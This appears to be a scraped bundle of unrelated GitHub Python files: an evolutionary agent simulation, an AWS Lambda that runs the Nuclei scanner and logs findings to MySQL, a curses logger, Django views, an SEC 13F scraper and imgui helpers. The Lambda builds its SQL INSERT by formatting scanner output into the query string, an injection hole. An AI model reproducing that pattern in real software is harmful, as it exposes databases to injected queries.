angle_to_target=np.pi/2, distance=30, iscomplex=False):\n\n        if not iscomplex: # We just create one target, depending on the angle:\n            pos_target = np.array(position_agent) + np.array([np.cos(angle_to_target), np.sin(angle_to_target)]) * distance\n\n            return list([pos_target]) # This form of output is necessary for _simulate_next_population()\n\n        else: # We create different Targets around the Agent, depending on its Position (ignoring the input angle):\n            circle = [0, np.pi/4, np.pi/2, 3*np.pi/4, np.pi, 5*np.pi/4, 3*np.pi/2, 7*np.pi/4]\n            pos_target = []\n            scalar = [.5, 2, 1, 1, 1.5, .5, 2, 1.5]\n\n            for j, cle in enumerate(circle):\n                tpos = np.array(position_agent) + np.array([np.cos(cle), np.sin(cle)]) * distance * scalar[j]\n                pos_target.append(tpos)\n\n            return pos_target\n\n    def _simulate_next_population(self, position_agent, pos_target):\n        \"\"\"\n        Run simulation => fitness\n        We save the distance to (each) target. 
The fitness will be the (average) distance\n If we have more than one target:\n - each agent will run through all trials (each trial the target is on a different position).\n - we take average Fitness over all ('complex trials')\n\n :param position_agent:\n :param pos_target:\n :return: Updates sorted pop_list\n \"\"\"\n\n assert self.pop_list[-1, 1] == 0, \"This population run already its simulation\"\n\n for i, string in enumerate(self.pop_list): # Run simulation with each agent\n\n genome_string = string[2:]\n\n fitness = []\n\n for tpos in pos_target:\n\n # reset self.agent and set new target position\n self.agent = CatchBot(position_agent=position_agent, position_target=[tpos[0], tpos[1]])\n\n self.implement_genome(genome_string) # implement the current genome in agent\n\n self.agent.movement(self.simlength)\n\n fitness.append(self.fitness())\n\n self.pop_list[i, 1] = np.sum(fitness)/len(fitness) # agent's average fitness will be stored\n\n self.pop_list = copy.copy(mat_sort(self.pop_list, index=1))\n\n def run_evolution(self, generations, mutation_var=0.10, complex_trials=True, fit_prop_sel=False,\n position_agent=[50, 50], angle_to_target=np.pi/2, distance_to_target=30):\n \"\"\"\n Run evolution for n-generations with particular mutation rate.\n\n :param generations: number of generations to run\n :param mutation_var: test out smaller value, 0.25 by default, according to Agmon & Beer (2013)\n :param complex_trials: if true multiple targets to catch\n :param fit_prop_sel: fitness proportionate selection\n :param position_agent: start position of agent in all trials\n :param angle_to_target: defines angle to target (in case of complex_trials, redundant)\n :param distance_to_target: defines corresponding distance to target (in case of complex_trials, redundant)\n \"\"\"\n\n # Ask whether results should be saved in external file\n save = save_request()\n\n # Run evolution:\n fitness_progress = np.zeros((generations, 3))\n\n pos_target = self._set_target(position_agent=position_agent,\n angle_to_target=angle_to_target,\n distance=distance_to_target,\n iscomplex=complex_trials)\n\n for i in range(generations):\n\n start_timer = datetime.datetime.now().replace(microsecond=0)\n\n self._reproduction(mutation_var=mutation_var, fps=fit_prop_sel)\n\n self._simulate_next_population(position_agent=position_agent,\n pos_target=pos_target)\n\n fitness_progress[i, 1:] = np.round(self.pick_best()[:, 1], 2)\n\n self.generation += 1\n\n fitness_progress[i, 0] = self.generation\n\n print(fitness_progress[i, 1:], \"Generation\", self.generation)\n\n # Estimate Duration of Evolution\n end_timer = datetime.datetime.now().replace(microsecond=0)\n duration = end_timer - start_timer\n rest_duration = duration * (generations - (i + 1))\n print(\"Time passed to evolve Generation {}: {} [h:m:s]\".format(self.generation-1, duration))\n print(\"Estimated time to evolve the rest {} Generations: {} [h:m:s]\".format(generations-(i + 1),\n rest_duration))\n\n # Save in external file:\n if save:\n\n self.filename = \"sim{}.mut{}.Gen{}-{}(Fitness {})\".format(self.simlength,\n mutation_var,\n self.generation - generations + 1,\n self.generation, np.round(self.pop_list[0, 1], 2))\n\n pickle.dump(self.pop_list, open('./poplists/Poplist.{}'.format(self.filename), 'wb'))\n pickle.dump(np.round(fitness_progress, 2),\n open('./poplists/Fitness_progress.{}'.format(self.filename), 'wb'))\n\n print('Evolution terminated. 
pop_list saved \n'\n                  '(Filename: \"Poplist.{}\")'.format(self.filename))\n        else:\n            print('Evolution terminated. \n'\n                  '(Caution: pop_list is not saved in external file)')\n\n    def reimplement_population(self, filename=None, plot=False):\n\n        if filename is None:\n            filename = self.filename\n            print(\"Reimplements its own pop_list file\")\n\n        # Reimplement: pop_list, simlength, Generation\n        self.pop_list = pickle.load(open('./poplists/Poplist.{}'.format(filename), 'rb'))\n\n        self.simlength = int(filename[filename.find('m')+1: filename.find('.')]) # depends on filename\n\n        fitness_progress = pickle.load(open('./poplists/Fitness_progress.{}'.format(filename), 'rb'))\n        self.generation = int(fitness_progress[-1, 0])\n\n        self.filename = filename\n\n        if plot:\n\n            animation = animation_request()\n\n            # here we plot the fitness progress of all generations\n            plt.figure()\n            plt.plot(fitness_progress[:, 1])\n            plt.plot(fitness_progress[:, 2])\n\n            # Here we plot the trajectory of the best agent:\n\n            self.plot_pop_list(animation=animation)\n            print(\"Plot the best agent\")\n\n            global n # this is needed for self.close()\n            n = 2\n\n    def plot_pop_list(self, n_agents=1, position_agent=[50, 50], animation=False):\n\n        global n\n        n = n_agents\n\n        pos_target = self._set_target(position_agent=position_agent, iscomplex=True)\n        col = [\"royalblue\", \"tomato\", \"palegreen\", \"fuchsia\", \"gold\", \"darkviolet\", \"darkslategray\", \"orange\"] # colors.cnames\n\n        for i in range(n_agents):\n\n            col_count = 0\n\n            if not animation:\n                plt.figure(figsize=(10, 6), dpi=80)\n            else:\n                plt.figure(figsize=(10, 6), dpi=40)\n\n            # Define borders\n            plt.xlim(0, 100)\n            plt.ylim(-15, 100)\n\n            for tpos in pos_target:\n                self.agent = CatchBot(position_agent=position_agent)\n                self.agent.position_target = tpos\n                self.implement_genome(self.pop_list[i, 2:])\n                plt.plot(tpos[0], tpos[1], 's', c=col[col_count]) # Plot Targets\n                self.run_and_plot(colour=col[col_count], animation=animation) # Plot Trajectory\n\n                col_count += 1\n\n            plt.plot(position_agent[0], position_agent[1], 'bo')\n\n        print(np.round(self.pop_list[0:n_agents, 0:3], 2))\n        if n_agents > 1:\n            print(\"Close all Windows with close()\")\n\n    @staticmethod\n    def close():\n        for j in range(n): # n is from the global variable of plot_pop_list()/reimplement_population()\n            plt.close()\n\n# t3 = Evolution(simlength=50)\n# t3.run_evolution(Generations=10)\n# t3.plot_pop_list(2)\n# t3.close()\n","repo_name":"SHEscher/Joint-Action","sub_path":"Evolution.py","file_name":"Evolution.py","file_ext":"py","file_size_in_byte":19620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
{"seq_id":"968011423","text":"import json\nimport boto3\nimport os\nimport io\nimport urllib.request\nimport zipfile\nimport subprocess\nimport re\nimport pymysql\nimport base64\nfrom botocore.exceptions import ClientError\nfrom os.path import exists\n\nsqsUrl = os.environ.get('sqsUrl')\nmountPath = os.environ.get('mountPath')\nnucleiBinaryPath = mountPath+\"/nuclei\"\nconnection = None\n\ndef get_connection():\n    try:\n        print(\"Connecting to database\")\n        DBEndPoint = os.environ.get(\"DB_HOST\")\n        DBUserName = os.environ.get(\"DB_USER\", \"test\")\n        DBName = os.environ.get(\"APP_DB_NAME\")\n        password = get_password()\n        conn = pymysql.connect(\n            host=DBEndPoint,\n            user=DBUserName,\n            password=password,\n            database=DBName,\n            charset='utf8mb4',\n            ssl_ca='rds-ca-2019-root.pem',\n            ssl_verify_cert=True\n        )\n        return conn\n    except Exception as e:\n        print(\"While connecting failed due to 
:{0}\".format(str(e)))\n return None\n\n# Sample code straight from AWS\ndef get_password():\n print(\"Fetching DB password\")\n secret_name = os.environ.get(\"APP_DB_PW\")\n region_name = os.environ.get(\"APP_REGION\")\n\n # Create a Secrets Manager client\n session = boto3.session.Session()\n client = session.client(\n service_name='secretsmanager',\n region_name=region_name\n )\n print(\"Secrets manager client created\")\n # In this sample we only handle the specific exceptions for the 'GetSecretValue' API.\n # See https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_GetSecretValue.html\n # We rethrow the exception by default.\n\n try:\n print(\"Attempting to fetch secret from client\")\n get_secret_value_response = client.get_secret_value(\n SecretId=secret_name\n )\n except ClientError as e:\n print(\"Error:\\n\")\n print(e)\n if e.response['Error']['Code'] == 'DecryptionFailureException':\n # Secrets Manager can't decrypt the protected secret text using the provided KMS key.\n # Deal with the exception here, and/or rethrow at your discretion.\n raise e\n elif e.response['Error']['Code'] == 'InternalServiceErrorException':\n # An error occurred on the server side.\n # Deal with the exception here, and/or rethrow at your discretion.\n raise e\n elif e.response['Error']['Code'] == 'InvalidParameterException':\n # You provided an invalid value for a parameter.\n # Deal with the exception here, and/or rethrow at your discretion.\n raise e\n elif e.response['Error']['Code'] == 'InvalidRequestException':\n # You provided a parameter value that is not valid for the current state of the resource.\n # Deal with the exception here, and/or rethrow at your discretion.\n raise e\n elif e.response['Error']['Code'] == 'ResourceNotFoundException':\n # We can't find the resource that you asked for.\n # Deal with the exception here, and/or rethrow at your discretion.\n raise e\n else:\n # Decrypts secret using the associated KMS key.\n # Depending on whether the secret is a string or binary, one of these fields will be populated.\n print(\"Returning Secret\")\n if 'SecretString' in get_secret_value_response:\n return get_secret_value_response['SecretString']\n else:\n return base64.b64decode(get_secret_value_response['SecretBinary'])\n\ndef install_nuclei():\n print(\"Downloading nuclei to EFS as it is not already present\")\n nucleiUrl = os.environ.get('nucleiUrl')\n zipPath = mountPath + \"/nuclei.zip\"\n urllib.request.urlretrieve(nucleiUrl, filename = zipPath)\n print(\"Nuclei Downloaded\")\n with zipfile.ZipFile(zipPath,\"r\") as zip_ref:\n zip_ref.extractall(mountPath)\n os.system(\"chmod 754 \"+nucleiBinaryPath)\n print(\"Nuclei installed\")\n\ndef add_to_db(results):\n print(\"Adding results to DB\")\n global connection\n try:\n if connection is None:\n print(\"No existing DB connection, connecting..\")\n connection = get_connection()\n if connection is None:\n print(\"Connection to DB could not be established, aborting\")\n return {\"status\": \"Error\", \"message\": \"Failed\"}\n with connection:\n with connection.cursor() as cursor:\n for result in results:\n print(\"Creating query for result:\")\n print(result)\n query = \"INSERT INTO vuln_db (timestamp_of_discovery, severity, cve_or_name, category, url, additional_info) VALUES ('{ts}', '{sev}', '{name}', '{category}', '{url}', '{info}')\".format(\n ts = result[1],\n sev = result[4],\n category = result[3],\n name = result[2],\n url = result[0],\n info = '' if len(result) < 6 else result[5]\n )\n print(\"Query:\\n\"+query)\n 
cursor.execute(query)\n                rows = cursor.fetchall() # keep fetched rows separate, so the results list below does not clobber them\n                print(\"Query Results:\")\n                results = []\n                for row in rows:\n                    results.append(row)\n                    print(row)\n            connection.commit()\n    except Exception as e:\n        print(\"Failed adding to DB due to :{0}\".format(str(e)))\n        try:\n            connection.close()\n            raise e\n        except Exception as e:\n            connection = None\n            print(\"Failed to close DB connection due to :{0}\".format(str(e)))\n            raise e\n\ndef lambda_handler(event, context):\n    print(\"Checking if Nuclei is installed\")\n    if not exists(nucleiBinaryPath):\n        install_nuclei()\n    print(\"Received event: \"+json.dumps(event))\n    targets = []\n    if \"Records\" in event:\n        targets.extend([json.loads(record[\"body\"]) for record in event[\"Records\"]])\n    else:\n        print(\"No records found in event:\"+json.dumps(event))\n    print(\"Targets to scan:\")\n    print(targets)\n    results = []\n    for target in targets:\n        print(\"Scan beginning for URL:\\n\"+target[\"url\"])\n        args = (nucleiBinaryPath, \"-u\", target[\"url\"], \"-silent\", \"-nc\")\n        popen = subprocess.Popen(args, stdout=subprocess.PIPE)\n        popen.wait()\n        print(\"Scan completed for URL:\\n\"+target[\"url\"])\n        print(\"Scan results:\")\n        popen.wait()\n        for line in io.TextIOWrapper(popen.stdout, encoding=\"utf-8\"):\n            print(line)\n            result = [target[\"url\"]]\n            result.extend(re.findall('\\[(.*?)\\]', line))\n            results.append(result)\n    return add_to_db(results)","repo_name":"Jamolo5/aws-nuclei","sub_path":"scanner/scanner/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":6773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
{"seq_id":"11906409539","text":"import curses\nimport atexit\nfrom datetime import datetime\n\n# This class is responsible for terminal output\nclass Logger():\n    def __init__(self, *args, **kwargs):\n        self._stdscr = curses.initscr()\n        height, width = self._stdscr.getmaxyx()\n\n        curses.start_color()\n        curses.use_default_colors()\n\n        self._initialize_log()\n        atexit.register(curses.endwin)\n\n    def _initialize_log(self):\n        # Box headers\n        DIVIDER = \"---------------------------------------------\"\n        self._width = len(DIVIDER)\n\n        TIME_ACTIVE = \"Time Active:\"\n        TIME_HEALTHY = \"Time Healthy:\"\n        TIME_CRITICAL = \"Time Critical:\"\n\n        HITS_TOTAL = \"Hits (Total):\"\n        HITS_2_MIN = \"Hits (Last Two Minutes):\"\n\n        DEFAULT_TIME = \"0:00:00.00\"\n\n        # Set up summary\n        self._stdscr.addstr(0, 0, \"Summary\")\n        self._stdscr.addstr(1, 0, DIVIDER)\n        self._stdscr.addstr(2, 0, TIME_ACTIVE)\n        self._stdscr.addstr(3, 0, TIME_HEALTHY)\n        self._stdscr.addstr(4, 0, TIME_CRITICAL)\n        self._stdscr.addstr(6, 0, HITS_TOTAL)\n        self._stdscr.addstr(7, 0, HITS_2_MIN)\n\n        # Set up alerts\n        self._alerts_bottom = 11\n        self._stdscr.addstr(self._alerts_bottom - 1, 0, \"Alerts:\")\n        self._stdscr.addstr(self._alerts_bottom, 0, DIVIDER)\n\n        self._top_sites_padding = 2\n\n        self._stdscr.addstr(self._top_sites_padding + self._alerts_bottom, 0, \"Top Sites by Hits (Updated every 10 s):\")\n        self._stdscr.addstr(self._top_sites_padding + self._alerts_bottom + 1, 0, DIVIDER)\n\n        self._stdscr.addstr(3, self._width - len(DEFAULT_TIME), DEFAULT_TIME)\n        self._stdscr.addstr(4, self._width - len(DEFAULT_TIME), DEFAULT_TIME)\n\n        self._stdscr.refresh()\n\n    def add_critical_status_alert(self, hits):\n        alert = \"High traffic generated an alert! 
Hits (Last 2 Min): {}, Triggered at {}\".format(\n hits, datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n )\n self._add_alert(alert)\n\n def add_healthy_status_alert(self, hits):\n alert = \"Traffic returned to the expected threshold at {}\".format(datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"))\n self._add_alert(alert)\n\n def _add_alert(self, alert):\n self._stdscr.move(self._alerts_bottom + 1, 0)\n self._stdscr.insertln()\n self._stdscr.addstr(self._alerts_bottom + 1, 0, alert)\n self._stdscr.refresh()\n self._alerts_bottom += 1\n\n def _format_time(self, elapsed):\n elapsed_str = str(elapsed)[:10]\n if len(elapsed_str) <= 8:\n elapsed_str += \".00\"\n return elapsed_str\n\n def update_timer(self, elapsed, healthy, critical):\n elapsed_str = self._format_time(elapsed)\n start = self._width - len(elapsed_str)\n self._stdscr.addstr(2, start, elapsed_str)\n self._stdscr.refresh()\n\n self._update_time_healthy(healthy)\n self._update_time_critical(critical)\n\n def _update_time_healthy(self, elapsed):\n time = self._format_time(elapsed)\n start = self._width - len(time)\n self._stdscr.addstr(3, start, time)\n self._stdscr.refresh()\n\n def _update_time_critical(self, elapsed):\n time = self._format_time(elapsed)\n start = self._width - len(time)\n self._stdscr.addstr(4, start, time)\n self._stdscr.refresh()\n\n def update_hits(self, hits):\n # Clear the last 10 characters\n hits_str = str(hits)\n self._stdscr.addstr(6, self._width - len(hits_str), hits_str)\n self._stdscr.refresh()\n\n def update_hits_2_min(self, hits):\n # Clear the last 10 characters\n hits_str = str(hits)\n start_point = self._width - 2 * len(hits_str)\n self._stdscr.move(7, start_point)\n self._stdscr.clrtoeol()\n self._stdscr.addstr(7, self._width - len(hits_str), hits_str)\n self._stdscr.refresh()\n\n def update_top_sites(self, top_sites):\n self._clear_after_line(self._get_top_sites_start() + 1)\n for indx, val in enumerate(top_sites):\n self._stdscr.addstr(self._get_top_sites_start() + indx + 1, 0, str(val[0])[:self._width - 3])\n self._stdscr.addstr(self._get_top_sites_start() + indx + 1, self._width - len(str(val[1])), str(val[1]))\n self._stdscr.refresh()\n\n def _clear_after_line(self, line):\n self._stdscr.move(line, 0)\n self._stdscr.clrtobot()\n\n def _get_top_sites_start(self):\n return self._alerts_bottom + self._top_sites_padding + 1\n","repo_name":"krumbot/http-inspector","sub_path":"src/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":4514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"74092320830","text":"from django.shortcuts import render, redirect\nfrom django.views import View\nfrom account.models import Account\nfrom group.models import Group\nfrom group.forms import GroupForm\n\n\nclass GroupsView(View):\n def get(self, request):\n main_user = Account.objects.select_related().get(pk=request.user.pk)\n groups = main_user.group.all()\n groups_under_management = groups.filter(admin=main_user)\n return render(request, 'group/groups.html', context={'main_user': main_user,\n 'groups': groups,\n 'groups_under_management': groups_under_management})\n\n\nclass GroupView(View):\n def get(self, request, pk):\n main_user = Account.objects.select_related().get(pk=request.user.pk)\n group = Group.objects.select_related().get(pk=pk)\n posts = group.posts.select_related()\n return render(request, 'group/public.html', context={'main_user': main_user,\n 'group': group,\n 'posts': posts})\n\n\nclass GroupCreateView(View):\n def 
get(self, request):\n main_user = Account.objects.select_related().get(pk=request.user.pk)\n form = GroupForm\n return render(request, 'group/create.html', context={'main_user': main_user,\n 'form': form})\n\n def post(self, request):\n main_user = Account.objects.select_related().get(pk=request.user.pk)\n group = Group.objects.create()\n form = GroupForm(request.POST, instance=group)\n if form.is_valid():\n group.admin.add(main_user)\n group.subscribers.add(main_user)\n form.save()\n group.save()\n return redirect('group', pk=group.pk)\n\n\nclass GroupEditView(View):\n def get(self, request, pk):\n main_user = Account.objects.select_related().get(pk=request.user.pk)\n group = Group.objects.select_related().get(pk=pk)\n form = GroupForm(instance=group)\n return render(request, 'group/edit.html', context={'main_user': main_user,\n 'group': group,\n 'form': form})\n\n def post(self, request, pk):\n group = Group.objects.select_related().get(pk=pk)\n form = GroupForm(request.POST, instance=group)\n if form.is_valid():\n form.save()\n return redirect('group', pk=group.pk)\n\n\nclass SubscribeToGroup(View):\n def get(self, request, pk):\n main_user = Account.objects.select_related().get(pk=request.user.pk)\n group = Group.objects.select_related().get(pk=pk)\n group.subscribers.add(main_user)\n group.save()\n return redirect('group', pk=group.pk)","repo_name":"DimaKalbfleysh/vk2.0","sub_path":"vk2/group/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2916,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"40678079420","text":"from unicodedata import name\nimport pandas as pd\nimport requests\nimport re\nimport csv\nimport lxml\nfrom bs4 import BeautifulSoup\n\nsec_url = 'https://www.sec.gov'\n\ndef get_request(url):\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36',\n 'Accept-Encoding': 'gzip, deflate, br',\n 'HOST': 'www.sec.gov',\n }\n return requests.get(url, headers=headers)\n\ndef create_url(cik):\n return 'https://www.sec.gov/cgi-bin/browse-edgar?CIK={}&owner=exclude&action=getcompany&type=13F-HR'.format(cik)\n\ndef get_user_input():\n cik = input(\"Enter 10-digit CIK number: \")\n return cik\n\n\ndef scrap_company_report(requested_cik):\n # Find mutual fund by CIK number on EDGAR\n response = get_request(create_url(requested_cik))\n soup = BeautifulSoup(response.text, \"html.parser\")\n tags = soup.findAll('a', id=\"documentsbutton\")\n\n last_report = (sec_url + tags[0]['href'])\n previous_report = (sec_url + tags[1]['href'])\n scrap_report_by_url(last_report, \"last_report\")\n scrap_report_by_url(previous_report, \"previous_report\")\n\n\ndef scrap_report_by_url(url, filename):\n response_two = get_request(url)\n soup_two = BeautifulSoup(response_two.text, \"html.parser\")\n tags_two = soup_two.findAll('a', attrs={'href': re.compile('xml')})\n xml_url = tags_two[3].get('href')\n\n response_xml = get_request(sec_url + xml_url)\n soup_xml = BeautifulSoup(response_xml.content, \"lxml\")\n xml_to_csv(soup_xml, filename)\n\n\ndef xml_to_csv(soup_xml, name):\n\n columns = [\n \"Name of Issuer\",\n \"CUSIP\",\n \"Value (x$1000)\",\n \"Shares\",\n \"Investment Discretion\",\n \"Voting Sole / Shared / None\"\n ]\n issuers = soup_xml.body.findAll(re.compile('nameofissuer'))\n cusips = soup_xml.body.findAll(re.compile('cusip'))\n values = soup_xml.body.findAll(re.compile('value'))\n sshprnamts = 
soup_xml.body.findAll('sshprnamt')\n sshprnamttypes = soup_xml.body.findAll(re.compile('sshprnamttype'))\n investmentdiscretions = soup_xml.body.findAll(re.compile('investmentdiscretion'))\n soles = soup_xml.body.findAll(re.compile('sole'))\n shareds = soup_xml.body.findAll(re.compile('shared'))\n nones = soup_xml.body.findAll(re.compile('none'))\n\n df = pd.DataFrame(columns= columns)\n\n for issuer, cusip, value, sshprnamt, sshprnamttype, investmentdiscretion, sole, shared, none in zip(issuers, cusips, values, sshprnamts, sshprnamttypes, investmentdiscretions, soles, shareds, nones):\n row = {\n \"Name of Issuer\": issuer.text,\n \"CUSIP\": cusip.text,\n \"Value (x$1000)\": value.text,\n \"Shares\": f\"{sshprnamt.text} {sshprnamttype.text}\",\n \"Investment Discretion\": investmentdiscretion.text,\n \"Voting Sole / Shared / None\": f\"{sole.text} / {shared.text} / {none.text}\"\n }\n df = df.append(row, ignore_index=True)\n\n\n df.to_csv(f\"{name}.csv\")\n\n\nrequested_cik = get_user_input()\nscrap_company_report(requested_cik)\n","repo_name":"CodeWritingCow/sec-web-scraper-13f","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":3071,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"60"} +{"seq_id":"6202934350","text":"def reverse(a):\n a_list = []\n for i in range(len(a)):\n a_list.append(a[len(a) - 1 -i])\n b = ''\n for j in range(len(a_list)):\n b += a_list[j]\n\n return b\n\ndef biggerOne(a,b):\n if a > b:\n return a\n else:\n return b\n\n\na, b = input().split()\n\na = reverse(a)\nb = reverse(b)\n\nprint(biggerOne(a,b))\n\n\n","repo_name":"raipier8818/BaekJoon","sub_path":"Python/2908.py","file_name":"2908.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"10229560442","text":"from inspect import getmembers, isfunction\nimport sys\nimport time\nimport numpy as np\nimport torch\nimport imgui\nimport cachetools\nimport contextlib\nimport pickle\nfrom cachetools.keys import hashkey\nfrom tqdm import tqdm\nfrom io import BytesIO\nfrom pathlib import Path\n\nimport sys, os\nsys.path += [os.path.abspath(os.path.dirname(__file__) + '/..')]\nfrom dnnlib import EasyDict\nfrom torch_utils.misc import named_params_and_buffers\n\n# Decorator for adding static state to function\ndef with_state(**kwargs):\n class State(EasyDict):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n setattr(self, 'defaults', kwargs)\n\n def reset(self):\n for k,v in self.defaults.items():\n self[k] = v\n\n def decorate(func):\n from functools import partial\n return partial(func, state=State(**kwargs))\n \n return decorate\n\n# Used to detect parameter changes for lazy recomputation\nclass ParamCache():\n def update(self, **kwargs):\n dirty = False\n for argname, val in kwargs.items():\n # Check pointer, then value\n current = getattr(self, argname, 0)\n if current is not val and pickle.dumps(current) != pickle.dumps(val):\n setattr(self, argname, val)\n dirty = True\n return dirty\n\n# Redirect stdout, stderr to UI\nclass Logger(object):\n def __init__(self, capacity=20, callback=lambda _ : None):\n self.capacity = capacity\n self.callback = callback\n self.queue = []\n self.str = ''\n\n self.stdout = sys.stdout\n self.stderr = sys.stderr\n\n sys.stdout = self\n sys.stderr = self\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_value, traceback):\n self.close()\n\n def flush(self):\n 
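# editor's note (not in the original source): flush only delegates to the real stdout captured in __init__, because write() has already mirrored the text into the queue and callback\n        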
self.stdout.flush()\n\n def close(self):\n self.flush()\n\n # if using multiple loggers, prevent closing in wrong order\n if sys.stdout is self:\n sys.stdout = self.stdout\n if sys.stderr is self:\n sys.stderr = self.stderr\n\n # Print calls write for each token\n def write(self, message):\n if isinstance(message, bytes):\n message = message.decode()\n \n # Workaround for a bug in VSCode debugger:\n # sys.stdout.write(''); sys.stdout.flush() => crash\n if len(message) == 0:\n return\n \n self.stdout.write(message)\n self.update_str(message)\n self.callback(message)\n\n def update_str(self, message):\n # Capacity ignored for now\n self.queue.append(message)\n self.str = ''.join(self.queue)\n\n def __getattr__(self, attr):\n return getattr(self.stdout, attr)\n\nclass Timer():\n def __init__(self, n_avg=1):\n self.len = n_avg\n self.reset()\n\n def reset(self):\n self.tlast = time.time()\n self.deltas = [0.0] * self.len # circular buffer\n self.idx = 0\n \n def tick(self):\n t = time.time()\n self.deltas[self.idx] = t - self.tlast\n self.idx = (self.idx + 1) % self.len\n self.tlast = t\n\n return sum(self.deltas) / self.len\n\n# with-block for item id\n@contextlib.contextmanager\ndef imgui_id(id: str):\n imgui.push_id(id)\n yield\n imgui.pop_id()\n\n# with-block for item width\n@contextlib.contextmanager\ndef imgui_item_width(size):\n imgui.push_item_width(size)\n yield\n imgui.pop_item_width()\n\n# Full screen imgui window\ndef begin_inline(name):\n with imgui.styled(imgui.STYLE_WINDOW_ROUNDING, 0):\n imgui.begin(name,\n flags = \\\n imgui.WINDOW_NO_TITLE_BAR |\n imgui.WINDOW_NO_RESIZE |\n imgui.WINDOW_NO_MOVE |\n imgui.WINDOW_NO_COLLAPSE |\n imgui.WINDOW_NO_SCROLLBAR |\n imgui.WINDOW_NO_SAVED_SETTINGS\n )\n\n# Recursive getattr\ndef rgetattr(obj, key, default=None):\n head = obj\n while '.' 
in key:\n bot, key = key.split('.', maxsplit=1)\n head = getattr(head, bot, {})\n return getattr(head, key, default)\n\ndef dict_diff(d1, d2):\n return _dict_diff_impl(d1, d2, {}, {}, {})\n\n# Compare two dicts, return partition of unique values\ndef _dict_diff_impl(d1, d2, left, right, changed): # cannot use default args => remembered between calls!\n only_left = set(d1.keys()) - set(d2.keys())\n only_right = set(d2.keys()) - set(d1.keys())\n both = set(d1.keys()).intersection(d2.keys())\n\n for k in only_left:\n left[k] = d1[k]\n\n for k in only_right:\n right[k] = d2[k]\n\n for k in both:\n if isinstance(d1[k], (dict, EasyDict)):\n for d in [left, right, changed]:\n d[k] = {}\n _dict_diff_impl(d1[k], d2[k], left[k], right[k], changed[k])\n for d in [left, right, changed]:\n if d[k] == {}:\n del d[k]\n elif d1[k] != d2[k]:\n changed[k] = (d1[k], d2[k])\n\n return (left, right, changed)\n\n# Combo box that returns value, not index\ndef combo_box_vals(title, values, current, height_in_items=-1, to_str=lambda v: v):\n curr_idx = 0 if current not in values else values.index(current)\n changed, ind = imgui.combo(title, curr_idx, [to_str(v) for v in values], height_in_items)\n return changed, values[ind]\n\n# Int2 slider that prevents overlap\ndef slider_range(v1, v2, vmin, vmax, push=False, title='', width=0.0):\n imgui.push_item_width(width)\n s, e = imgui.slider_int2(title, v1, v2, vmin, vmax)[1]\n imgui.pop_item_width()\n\n if push:\n return (min(s, e), max(s, e))\n elif s != v1:\n return (min(s, e), e)\n elif e != v2:\n return (s, max(s, e))\n else:\n return (s, e)\n\ndef parse_res(res_str):\n res_confs = {\n '256x256': (2, 2, 7),\n '384x256': (3, 2, 7),\n '640x384': (5, 3, 7),\n '512x512': (4, 4, 7),\n '512x640': (4, 5, 7),\n '1024x1024': (4, 4, 8),\n '1280x768': (5, 3, 8),\n }\n assert res_str in res_confs, f'Unknown resolution {res_str}'\n return res_confs[res_str]\n\n# Shape batch as square if possible\ndef get_grid_dims(B):\n if B == 0:\n return (0, 0)\n \n S = int(B**0.5 + 0.5)\n while B % S != 0:\n S -= 1\n return (B // S, S) # (W, H)\n\ndef reshape_grid_np(img_batch):\n if isinstance(img_batch, list):\n img_batch = np.concatenate(img_batch, axis=0) # along batch dim\n \n B, C, H, W = img_batch.shape\n cols, rows = get_grid_dims(B)\n\n img_batch = np.reshape(img_batch, [rows, cols, C, H, W])\n img_batch = np.transpose(img_batch, [0, 3, 1, 4, 2])\n img_batch = np.reshape(img_batch, [rows * H, cols * W, C])\n\n return img_batch\n\ndef reshape_grid_torch(img_batch):\n if isinstance(img_batch, list):\n img_batch = torch.cat(img_batch, axis=0) # along batch dim\n \n B, C, H, W = img_batch.shape\n cols, rows = get_grid_dims(B)\n\n img_batch = img_batch.reshape(rows, cols, C, H, W)\n img_batch = img_batch.permute(0, 3, 1, 4, 2)\n img_batch = img_batch.reshape(rows * H, cols * W, C)\n\n return img_batch\n\ndef reshape_grid(batch):\n return reshape_grid_torch(batch) if torch.is_tensor(batch) else reshape_grid_np(batch)\n\ndef sample_seeds(N, base=None):\n if base is None:\n base = np.random.randint(np.iinfo(np.int32).max - N)\n return [(base + s) for s in range(N)]\n\ndef sample_latent(B, n_dims=512, seed=None):\n seeds = sample_seeds(B, base=seed)\n return seeds_to_latents(seeds, n_dims)\n\ndef seeds_to_latents(seeds, n_dims=512):\n latents = np.zeros((len(seeds), n_dims), dtype=np.float32)\n for i, seed in enumerate(seeds):\n rng = np.random.RandomState(seed)\n latents[i] = rng.standard_normal(n_dims)\n \n return latents\n\n# Map stack of per-frequency ts to single global t\ndef 
